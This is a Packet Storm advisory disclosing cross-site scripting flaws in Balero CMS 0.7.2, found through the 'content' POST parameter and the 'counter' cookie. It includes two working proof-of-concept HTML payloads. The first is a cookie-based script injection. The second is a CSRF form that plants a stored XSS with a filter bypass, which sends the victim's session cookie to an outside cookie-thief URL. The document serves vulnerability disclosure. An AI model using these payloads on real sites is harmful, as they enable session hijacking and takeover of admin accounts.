Balero CMS 0.7.2 Cross Site Scripting

2015-04-07T00:00:00
ID PACKETSTORM:131324
Type packetstorm
Reporter LiquidWorm
Modified 2015-04-07T00:00:00

Description

                                        
                                            `<!--  
  
Balero CMS v0.7.2 Multiple JS/HTML Injection Vulnerabilities  
  
Vendor: BaleroCMS Software  
Product web page: http://www.balerocms.com  
Affected version: 0.7.2  
  
Summary: Balero CMS is an open source project that can help you manage  
the page of your company with just a few guided steps, minimizing the  
costs that many companies make to have your advertising medium and/or  
portal.  
  
Desc: Input passed to the 'content' POST parameter and the cookie 'counter'  
is not properly sanitised before being returned to the user. This can be  
exploited to execute arbitrary HTML and script code in a user's browser  
session in context of an affected site.  
  
Tested on: Apache 2.4.10 (Win32)  
PHP 5.6.3  
MySQL 5.6.21  
  
  
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2015-5239  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5239.php  
  
  
04.03.2015  
  
-->  
  
  
<html>  
<body>  
<script>  
document.cookie="counter=1<script>confirm('XSS')</script>; path=/balerocms/";  
</script>  
</body>  
</html>  
  
  
csrf+stored xss+filter bypass+session hijack:  
  
<html>  
<body>  
<form action="http://localhost/balerocms/admin/edit_delete_post/mod-blog" method="POST">  
<input type="hidden" name="title" value="ZSL" />  
<input type="hidden" name="content" value="pwned</textarea><s\cript>document.location="http://www.zeroscience.mk/pentest/cthief.php?cookie="+docu\ment.cookie;</s\cript>" />  
<input type="hidden" name="files" value="joxy.poxy" />  
<input type="hidden" name="delete_post[]" value="135" />  
<input type="hidden" name="id" value="135" />  
<input type="hidden" name="submit" value="" />  
<input type="submit" value="Submit form" />  
</form>  
</body>  
</html>  
`